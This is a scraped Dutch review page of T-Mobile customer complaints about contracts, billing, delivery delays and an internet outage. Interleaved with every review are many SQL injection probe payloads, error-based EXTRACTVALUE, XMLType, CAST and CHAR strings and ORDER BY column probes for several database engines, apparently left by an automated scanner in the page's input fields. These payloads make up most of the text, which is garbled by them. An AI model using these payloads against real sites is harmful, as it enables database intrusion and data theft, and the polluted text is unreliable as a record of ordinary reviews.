  gmjc' AND 6916=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(118)||CHR(112)||CHR(112)||CHR(113)||(SELECT (CASE WHEN (6916=6916) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(98)||CHR(106)||CHR(122)||CHR(113)||CHR(62))) FROM DUAL) AND 'ApCu'='ApCu

  gmjc) AND 6916=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(118)||CHR(112)||CHR(112)||CHR(113)||(SELECT (CASE WHEN (6916=6916) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(98)||CHR(106)||CHR(122)||CHR(113)||CHR(62))) FROM DUAL) AND (5018=5018

  gmjc AND 6916=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(118)||CHR(112)||CHR(112)||CHR(113)||(SELECT (CASE WHEN (6916=6916) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(98)||CHR(106)||CHR(122)||CHR(113)||CHR(62))) FROM DUAL)

  gmjc AND 6916=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(118)||CHR(112)||CHR(112)||CHR(113)||(SELECT (CASE WHEN (6916=6916) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(98)||CHR(106)||CHR(122)||CHR(113)||CHR(62))) FROM DUAL)-- Iius

  gmjc') ORDER BY 1-- htvU

  gmjc' ORDER BY 1-- tuYU

  gmjc) ORDER BY 1-- GchT

  gmjc ORDER BY 1-- dxVk

  gmjc ORDER BY 1-- kPoh

 • Bestellen

  Service

  Prijs

  Levering

  Zou hier weer kopen
  Totaal

  iwatch ultra

  Op 24 feb 2023 een iwatch ultra gekocht met multisim, op contract basis, in de T mobile winkel van Hoogezand. Hoewel goed doorgegeven werd de iwatch aangekocht op het 06 nummer van mijn vrouw. De medewerker vertelde ons dat de multisim eenvoudig te switchen was van het ene naar het andere toestel. Dit bleek dus niet waar en moest het contract ontbonden worden om de multisim van het toestel van mijn vrouw afgekoppeld te krijgen. Dit hield tevens ook in dat de iwatch retour moest. Verzendkosten voor eigen rekening terwijl de fout bij T Mobile lag. Ik wacht af wat er nog meer volgt. Ik ben zeer teleurgesteld in T Mobile en durf het niet meer aan nog wat bij T Mobile te bestellen.

  qwFA') AND EXTRACTVALUE(7232,CONCAT(0x5c,0x7170767071,(SELECT (ELT(7232=7232,1))),0x716a716b71)) AND ('Xxba'='Xxba

  qwFA' AND EXTRACTVALUE(7232,CONCAT(0x5c,0x7170767071,(SELECT (ELT(7232=7232,1))),0x716a716b71)) AND 'MfNm'='MfNm

  qwFA) AND EXTRACTVALUE(7232,CONCAT(0x5c,0x7170767071,(SELECT (ELT(7232=7232,1))),0x716a716b71)) AND (1703=1703

  qwFA AND EXTRACTVALUE(7232,CONCAT(0x5c,0x7170767071,(SELECT (ELT(7232=7232,1))),0x716a716b71))

  qwFA AND EXTRACTVALUE(7232,CONCAT(0x5c,0x7170767071,(SELECT (ELT(7232=7232,1))),0x716a716b71))-- PgTd

  qwFA') AND 1903=CAST((CHR(113)||CHR(112)||CHR(118)||CHR(112)||CHR(113))||(SELECT (CASE WHEN (1903=1903) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(106)||CHR(113)||CHR(107)||CHR(113)) AS NUMERIC) AND ('Rrbc'='Rrbc

  qwFA' AND 1903=CAST((CHR(113)||CHR(112)||CHR(118)||CHR(112)||CHR(113))||(SELECT (CASE WHEN (1903=1903) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(106)||CHR(113)||CHR(107)||CHR(113)) AS NUMERIC) AND 'RKmD'='RKmD

  qwFA) AND 1903=CAST((CHR(113)||CHR(112)||CHR(118)||CHR(112)||CHR(113))||(SELECT (CASE WHEN (1903=1903) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(106)||CHR(113)||CHR(107)||CHR(113)) AS NUMERIC) AND (9674=9674

  qwFA AND 1903=CAST((CHR(113)||CHR(112)||CHR(118)||CHR(112)||CHR(113))||(SELECT (CASE WHEN (1903=1903) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(106)||CHR(113)||CHR(107)||CHR(113)) AS NUMERIC)

  qwFA AND 1903=CAST((CHR(113)||CHR(112)||CHR(118)||CHR(112)||CHR(113))||(SELECT (CASE WHEN (1903=1903) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(106)||CHR(113)||CHR(107)||CHR(113)) AS NUMERIC)-- iqZk

  qwFA') AND 4168 IN (SELECT (CHAR(113)+CHAR(112)+CHAR(118)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (4168=4168) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(113)+CHAR(107)+CHAR(113))) AND ('LSbq'='LSbq

  qwFA' AND 4168 IN (SELECT (CHAR(113)+CHAR(112)+CHAR(118)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (4168=4168) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(113)+CHAR(107)+CHAR(113))) AND 'VAwM'='VAwM

  qwFA) AND 4168 IN (SELECT (CHAR(113)+CHAR(112)+CHAR(118)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (4168=4168) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(113)+CHAR(107)+CHAR(113))) AND (9723=9723

  qwFA AND 4168 IN (SELECT (CHAR(113)+CHAR(112)+CHAR(118)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (4168=4168) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(113)+CHAR(107)+CHAR(113)))

  qwFA AND 4168 IN (SELECT (CHAR(113)+CHAR(112)+CHAR(118)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (4168=4168) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(113)+CHAR(107)+CHAR(113)))-- CITS

  qwFA') AND 6378=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(112)||CHR(118)||CHR(112)||CHR(113)||(SELECT (CASE WHEN (6378=6378) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(113)||CHR(107)||CHR(113)||CHR(62))) FROM DUAL) AND ('lxmR'='lxmR

  qwFA' AND 6378=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(112)||CHR(118)||CHR(112)||CHR(113)||(SELECT (CASE WHEN (6378=6378) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(113)||CHR(107)||CHR(113)||CHR(62))) FROM DUAL) AND 'Woaq'='Woaq

  qwFA) AND 6378=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(112)||CHR(118)||CHR(112)||CHR(113)||(SELECT (CASE WHEN (6378=6378) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(113)||CHR(107)||CHR(113)||CHR(62))) FROM DUAL) AND (7704=7704

  qwFA AND 6378=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(112)||CHR(118)||CHR(112)||CHR(113)||(SELECT (CASE WHEN (6378=6378) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(113)||CHR(107)||CHR(113)||CHR(62))) FROM DUAL)

  qwFA AND 6378=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(112)||CHR(118)||CHR(112)||CHR(113)||(SELECT (CASE WHEN (6378=6378) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(113)||CHR(107)||CHR(113)||CHR(62))) FROM DUAL)-- chOo

  qwFA') ORDER BY 1-- eUIU

  qwFA' ORDER BY 1-- AtdO

  qwFA) ORDER BY 1-- FaiK

  qwFA ORDER BY 1-- deGi

  qwFA ORDER BY 1-- xDnj

 • Bestellen

  Service

  Prijs

  Levering

  Zou hier weer kopen
  Totaal

  Sim Only

  Sinds jaar en dag bij T Mobile met een Sim Only abonnement. Enkele weken geleden een verlenging afgesloten voor wederom 2 jaar en met een daaraan gekoppelde maandprijs. Nu zijn dit de kosten niet maar het wordt een principe kwestie. Kijkende naar mijn factuur bleek deze wat hoger uit te vallen dan het gestelde aanbod. Na de klantenservice gebeld te hebben werd aangegeven dat dit met de inflatie te maken had. Bijzonder dat de aangeboden contract prijs eigenlijk, in mijn ogen, fictief is. Verlenging inmiddels opgezegd en er zijn tenslotte meerdere aanbieders op de markt. Jammer voor dit.

  ljGb') AND EXTRACTVALUE(5961,CONCAT(0x5c,0x71707a7871,(SELECT (ELT(5961=5961,1))),0x716a6a7171)) AND ('sIxV'='sIxV

  ljGb' AND EXTRACTVALUE(5961,CONCAT(0x5c,0x71707a7871,(SELECT (ELT(5961=5961,1))),0x716a6a7171)) AND 'NCHi'='NCHi

  ljGb) AND EXTRACTVALUE(5961,CONCAT(0x5c,0x71707a7871,(SELECT (ELT(5961=5961,1))),0x716a6a7171)) AND (5734=5734

  ljGb AND EXTRACTVALUE(5961,CONCAT(0x5c,0x71707a7871,(SELECT (ELT(5961=5961,1))),0x716a6a7171))

  ljGb AND EXTRACTVALUE(5961,CONCAT(0x5c,0x71707a7871,(SELECT (ELT(5961=5961,1))),0x716a6a7171))-- AOSR

  ljGb') AND 3890=CAST((CHR(113)||CHR(112)||CHR(122)||CHR(120)||CHR(113))||(SELECT (CASE WHEN (3890=3890) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(106)||CHR(106)||CHR(113)||CHR(113)) AS NUMERIC) AND ('DmAD'='DmAD

  ljGb' AND 3890=CAST((CHR(113)||CHR(112)||CHR(122)||CHR(120)||CHR(113))||(SELECT (CASE WHEN (3890=3890) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(106)||CHR(106)||CHR(113)||CHR(113)) AS NUMERIC) AND 'zTar'='zTar

  ljGb) AND 3890=CAST((CHR(113)||CHR(112)||CHR(122)||CHR(120)||CHR(113))||(SELECT (CASE WHEN (3890=3890) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(106)||CHR(106)||CHR(113)||CHR(113)) AS NUMERIC) AND (5990=5990

  ljGb AND 3890=CAST((CHR(113)||CHR(112)||CHR(122)||CHR(120)||CHR(113))||(SELECT (CASE WHEN (3890=3890) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(106)||CHR(106)||CHR(113)||CHR(113)) AS NUMERIC)

  ljGb AND 3890=CAST((CHR(113)||CHR(112)||CHR(122)||CHR(120)||CHR(113))||(SELECT (CASE WHEN (3890=3890) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(106)||CHR(106)||CHR(113)||CHR(113)) AS NUMERIC)-- gwhy

  ljGb') AND 4733 IN (SELECT (CHAR(113)+CHAR(112)+CHAR(122)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (4733=4733) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(106)+CHAR(113)+CHAR(113))) AND ('pqrK'='pqrK

  ljGb' AND 4733 IN (SELECT (CHAR(113)+CHAR(112)+CHAR(122)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (4733=4733) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(106)+CHAR(113)+CHAR(113))) AND 'Lmks'='Lmks

  ljGb) AND 4733 IN (SELECT (CHAR(113)+CHAR(112)+CHAR(122)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (4733=4733) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(106)+CHAR(113)+CHAR(113))) AND (1229=1229

  ljGb AND 4733 IN (SELECT (CHAR(113)+CHAR(112)+CHAR(122)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (4733=4733) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(106)+CHAR(113)+CHAR(113)))

  ljGb AND 4733 IN (SELECT (CHAR(113)+CHAR(112)+CHAR(122)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (4733=4733) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(106)+CHAR(113)+CHAR(113)))-- VNie

  ljGb') AND 3609=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(112)||CHR(122)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (3609=3609) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(106)||CHR(113)||CHR(113)||CHR(62))) FROM DUAL) AND ('iVGL'='iVGL

  ljGb' AND 3609=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(112)||CHR(122)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (3609=3609) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(106)||CHR(113)||CHR(113)||CHR(62))) FROM DUAL) AND 'BHYH'='BHYH

  ljGb) AND 3609=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(112)||CHR(122)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (3609=3609) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(106)||CHR(113)||CHR(113)||CHR(62))) FROM DUAL) AND (1396=1396

  ljGb AND 3609=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(112)||CHR(122)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (3609=3609) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(106)||CHR(113)||CHR(113)||CHR(62))) FROM DUAL)

  ljGb AND 3609=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(112)||CHR(122)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (3609=3609) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(106)||CHR(113)||CHR(113)||CHR(62))) FROM DUAL)-- zZvD

  ljGb') ORDER BY 1-- PMWG

  ljGb' ORDER BY 1-- mnbR

  ljGb) ORDER BY 1-- NUhI

  ljGb ORDER BY 1-- pkoK

  ljGb ORDER BY 1-- YAAF

 • Bestellen

  Service

  Prijs

  Levering

  Zou hier weer kopen
  Totaal

  Gasvezeinternet

  Klantenservice T-Mobile is waardeloos!!

  Ik heb op 13 december 2022 een jaarcontract glasvezelinternet afgesloten waarbij mij werd beloofd dat ik na 8 maanden het tv abonnement (die ik eigenlijk niet wilde) kon opzeggen. Dit klopte al helemaal niet omdat het een jaarcontract betreft. Daarnaast konden ze achteraf niet de glasvezelaansluiting leveren op de datum dat ze hadden aangegeven dus kreeg ik ter compensatie een router met onbeperkt internet tot de aansluiting compleet was. Ik vond dit een prima oplossing. Maar.......de kosten van de router inclusief simkaart was €90 en moest ik "even" voorschieten door de router en simkaart zelf aan te schaffen. De €90 zou NA het opsturen van de factuur direct op mijn rekening overgemaakt worden. Nou, je raadt het al: we zijn nu ruim 2 maanden en tientallen mails en belletjes verder maar het geld blijft uit. Je krijgt geen persoon aangewezen die je zaak behandeld maar telkens gaat er een andere medewerker van de klantenservice naar kijken. Echt waardeloos te noemen hoe T-Mobile problemen NIET OPLOST maar voor zich uitschuift.

  Ik zou mij echt 2x bedenken voordat je met ze in zee gaat want je krijgt ten eerste niet wat je vraagt en je komt daarna heel moeilijk van ze af. Voor mij NOOIT T-mobile meer!!!!!

  Jkwy') AND EXTRACTVALUE(1414,CONCAT(0x5c,0x716b627871,(SELECT (ELT(1414=1414,1))),0x7176786271)) AND ('XWbD'='XWbD

  Jkwy' AND EXTRACTVALUE(1414,CONCAT(0x5c,0x716b627871,(SELECT (ELT(1414=1414,1))),0x7176786271)) AND 'PakX'='PakX

  Jkwy) AND EXTRACTVALUE(1414,CONCAT(0x5c,0x716b627871,(SELECT (ELT(1414=1414,1))),0x7176786271)) AND (3865=3865

  Jkwy AND EXTRACTVALUE(1414,CONCAT(0x5c,0x716b627871,(SELECT (ELT(1414=1414,1))),0x7176786271))

  Jkwy AND EXTRACTVALUE(1414,CONCAT(0x5c,0x716b627871,(SELECT (ELT(1414=1414,1))),0x7176786271))-- wQao

  Jkwy') AND 9132=CAST((CHR(113)||CHR(107)||CHR(98)||CHR(120)||CHR(113))||(SELECT (CASE WHEN (9132=9132) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(118)||CHR(120)||CHR(98)||CHR(113)) AS NUMERIC) AND ('ixOi'='ixOi

  Jkwy' AND 9132=CAST((CHR(113)||CHR(107)||CHR(98)||CHR(120)||CHR(113))||(SELECT (CASE WHEN (9132=9132) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(118)||CHR(120)||CHR(98)||CHR(113)) AS NUMERIC) AND 'lsKt'='lsKt

  Jkwy) AND 9132=CAST((CHR(113)||CHR(107)||CHR(98)||CHR(120)||CHR(113))||(SELECT (CASE WHEN (9132=9132) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(118)||CHR(120)||CHR(98)||CHR(113)) AS NUMERIC) AND (5616=5616

  Jkwy AND 9132=CAST((CHR(113)||CHR(107)||CHR(98)||CHR(120)||CHR(113))||(SELECT (CASE WHEN (9132=9132) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(118)||CHR(120)||CHR(98)||CHR(113)) AS NUMERIC)

  Jkwy AND 9132=CAST((CHR(113)||CHR(107)||CHR(98)||CHR(120)||CHR(113))||(SELECT (CASE WHEN (9132=9132) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(118)||CHR(120)||CHR(98)||CHR(113)) AS NUMERIC)-- MDkA

  Jkwy') AND 6267 IN (SELECT (CHAR(113)+CHAR(107)+CHAR(98)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (6267=6267) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(120)+CHAR(98)+CHAR(113))) AND ('lMAo'='lMAo

  Jkwy' AND 6267 IN (SELECT (CHAR(113)+CHAR(107)+CHAR(98)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (6267=6267) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(120)+CHAR(98)+CHAR(113))) AND 'UgVc'='UgVc

  Jkwy) AND 6267 IN (SELECT (CHAR(113)+CHAR(107)+CHAR(98)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (6267=6267) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(120)+CHAR(98)+CHAR(113))) AND (9415=9415

  Jkwy AND 6267 IN (SELECT (CHAR(113)+CHAR(107)+CHAR(98)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (6267=6267) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(120)+CHAR(98)+CHAR(113)))

  Jkwy AND 6267 IN (SELECT (CHAR(113)+CHAR(107)+CHAR(98)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (6267=6267) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(120)+CHAR(98)+CHAR(113)))-- fZtH

  Jkwy') AND 9263=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(107)||CHR(98)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (9263=9263) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(118)||CHR(120)||CHR(98)||CHR(113)||CHR(62))) FROM DUAL) AND ('pjID'='pjID

  Jkwy' AND 9263=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(107)||CHR(98)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (9263=9263) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(118)||CHR(120)||CHR(98)||CHR(113)||CHR(62))) FROM DUAL) AND 'qXdp'='qXdp

  Jkwy) AND 9263=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(107)||CHR(98)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (9263=9263) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(118)||CHR(120)||CHR(98)||CHR(113)||CHR(62))) FROM DUAL) AND (9302=9302

  Jkwy AND 9263=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(107)||CHR(98)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (9263=9263) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(118)||CHR(120)||CHR(98)||CHR(113)||CHR(62))) FROM DUAL)

  Jkwy AND 9263=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(107)||CHR(98)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (9263=9263) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(118)||CHR(120)||CHR(98)||CHR(113)||CHR(62))) FROM DUAL)-- WczR

  Jkwy') ORDER BY 1-- vKhp

  Jkwy' ORDER BY 1-- QMRH

  Jkwy) ORDER BY 1-- MNTs

  Jkwy ORDER BY 1-- pOfI

  Jkwy ORDER BY 1-- ZImL

 • Bestellen

  Service

  Prijs

  Levering

  Zou hier weer kopen
  Totaal

  Iphone 14Pro

  I'm already waiting 9 weeks for the phone I ordered while extending contract. On T-Mobile web there was an info about 3-4 weeks waiting time when I made purchase. I didn't get any message about longer waiting time. After calling the client service I was told that my device is waiting for me in the store. I went to pick it up and get informed that their in-store stock system doesn't work so my phone is not there.

  ifEm') AND EXTRACTVALUE(7177,CONCAT(0x5c,0x7176767871,(SELECT (ELT(7177=7177,1))),0x7171716a71)) AND ('oaxd'='oaxd

  ifEm' AND EXTRACTVALUE(7177,CONCAT(0x5c,0x7176767871,(SELECT (ELT(7177=7177,1))),0x7171716a71)) AND 'fNtp'='fNtp

  ifEm) AND EXTRACTVALUE(7177,CONCAT(0x5c,0x7176767871,(SELECT (ELT(7177=7177,1))),0x7171716a71)) AND (9279=9279

  ifEm AND EXTRACTVALUE(7177,CONCAT(0x5c,0x7176767871,(SELECT (ELT(7177=7177,1))),0x7171716a71))

  ifEm AND EXTRACTVALUE(7177,CONCAT(0x5c,0x7176767871,(SELECT (ELT(7177=7177,1))),0x7171716a71))-- ETGh

  ifEm') AND 5623=CAST((CHR(113)||CHR(118)||CHR(118)||CHR(120)||CHR(113))||(SELECT (CASE WHEN (5623=5623) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(113)||CHR(113)||CHR(106)||CHR(113)) AS NUMERIC) AND ('gluL'='gluL

  ifEm' AND 5623=CAST((CHR(113)||CHR(118)||CHR(118)||CHR(120)||CHR(113))||(SELECT (CASE WHEN (5623=5623) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(113)||CHR(113)||CHR(106)||CHR(113)) AS NUMERIC) AND 'OLFV'='OLFV

  ifEm) AND 5623=CAST((CHR(113)||CHR(118)||CHR(118)||CHR(120)||CHR(113))||(SELECT (CASE WHEN (5623=5623) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(113)||CHR(113)||CHR(106)||CHR(113)) AS NUMERIC) AND (1239=1239

  ifEm AND 5623=CAST((CHR(113)||CHR(118)||CHR(118)||CHR(120)||CHR(113))||(SELECT (CASE WHEN (5623=5623) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(113)||CHR(113)||CHR(106)||CHR(113)) AS NUMERIC)

  ifEm AND 5623=CAST((CHR(113)||CHR(118)||CHR(118)||CHR(120)||CHR(113))||(SELECT (CASE WHEN (5623=5623) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(113)||CHR(113)||CHR(106)||CHR(113)) AS NUMERIC)-- ZMpi

  ifEm') AND 3306 IN (SELECT (CHAR(113)+CHAR(118)+CHAR(118)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (3306=3306) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(113)+CHAR(106)+CHAR(113))) AND ('YBod'='YBod

  ifEm' AND 3306 IN (SELECT (CHAR(113)+CHAR(118)+CHAR(118)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (3306=3306) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(113)+CHAR(106)+CHAR(113))) AND 'OHtM'='OHtM

  ifEm) AND 3306 IN (SELECT (CHAR(113)+CHAR(118)+CHAR(118)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (3306=3306) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(113)+CHAR(106)+CHAR(113))) AND (3626=3626

  ifEm AND 3306 IN (SELECT (CHAR(113)+CHAR(118)+CHAR(118)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (3306=3306) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(113)+CHAR(106)+CHAR(113)))

  ifEm AND 3306 IN (SELECT (CHAR(113)+CHAR(118)+CHAR(118)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (3306=3306) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(113)+CHAR(106)+CHAR(113)))-- ArEr

  ifEm') AND 1265=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(118)||CHR(118)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (1265=1265) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(113)||CHR(113)||CHR(106)||CHR(113)||CHR(62))) FROM DUAL) AND ('gKgu'='gKgu

  ifEm' AND 1265=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(118)||CHR(118)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (1265=1265) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(113)||CHR(113)||CHR(106)||CHR(113)||CHR(62))) FROM DUAL) AND 'kZVk'='kZVk

  ifEm) AND 1265=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(118)||CHR(118)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (1265=1265) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(113)||CHR(113)||CHR(106)||CHR(113)||CHR(62))) FROM DUAL) AND (8088=8088

  ifEm AND 1265=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(118)||CHR(118)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (1265=1265) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(113)||CHR(113)||CHR(106)||CHR(113)||CHR(62))) FROM DUAL)

  ifEm AND 1265=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(118)||CHR(118)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (1265=1265) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(113)||CHR(113)||CHR(106)||CHR(113)||CHR(62))) FROM DUAL)-- dpjG

  ifEm') ORDER BY 1-- gudF

  ifEm' ORDER BY 1-- FjzP

  ifEm) ORDER BY 1-- CVsg

  ifEm ORDER BY 1-- DCEk

  ifEm ORDER BY 1-- jmWs

 • Bestellen

  Service

  Prijs

  Levering

  Zou hier weer kopen
  Totaal

  Thuis Internet

  No house internet for 3 months! In August I subscribed to T-Mobile house internet and at first, it took them more than 3 weeks just to install it. They said it will be active in a few days, but it wasn't. After 7 or 8 calls they finally sent someone -after 1 month!?!?!- to check the connection. The person left saying he needs to check something but he didn't come back nor informed me about anything. Again after 10-15 calls, I was told that the issue was with the signal company that Tmobile works with. But if I didn't make all those calls, for which I waited tens of minutes each time, they wouldn't realize and make an action. And even then it took them weeks even months to do so. They said the signal company was called Guidion and then it was called Kpn and then it was again something else. Lies over lies. There was only one person(Max) who took some initiative and gave me some answers. Afaik, until I spoke to him, nothing was done, and this was in late October! From early Aug to late Oct, no action from
  TMobile, shame! I wish this was it. They said the signal carrier has to make a meeting to check the issue and were suppose to call me afterward. Ofc they didn't call. It has been two weeks and I still didn't hear anything from them even though I keep calling
  TMobile every day. The amount of calls I had with them in the past 3 months is obscene. If you are not capable to fix a signal issue, at least have some honor to inform your clients. I still don't know why I have no internet. Give me one proper reason to not switch to another company. One!

  vsXG') AND EXTRACTVALUE(2780,CONCAT(0x5c,0x7162706a71,(SELECT (ELT(2780=2780,1))),0x7170767871)) AND ('cFCM'='cFCM

  vsXG' AND EXTRACTVALUE(2780,CONCAT(0x5c,0x7162706a71,(SELECT (ELT(2780=2780,1))),0x7170767871)) AND 'HOHw'='HOHw

  vsXG) AND EXTRACTVALUE(2780,CONCAT(0x5c,0x7162706a71,(SELECT (ELT(2780=2780,1))),0x7170767871)) AND (1993=1993

  vsXG AND EXTRACTVALUE(2780,CONCAT(0x5c,0x7162706a71,(SELECT (ELT(2780=2780,1))),0x7170767871))

  vsXG AND EXTRACTVALUE(2780,CONCAT(0x5c,0x7162706a71,(SELECT (ELT(2780=2780,1))),0x7170767871))-- YvOb

  vsXG') AND 5506=CAST((CHR(113)||CHR(98)||CHR(112)||CHR(106)||CHR(113))||(SELECT (CASE WHEN (5506=5506) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(112)||CHR(118)||CHR(120)||CHR(113)) AS NUMERIC) AND ('irJo'='irJo

  vsXG' AND 5506=CAST((CHR(113)||CHR(98)||CHR(112)||CHR(106)||CHR(113))||(SELECT (CASE WHEN (5506=5506) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(112)||CHR(118)||CHR(120)||CHR(113)) AS NUMERIC) AND 'OMhn'='OMhn

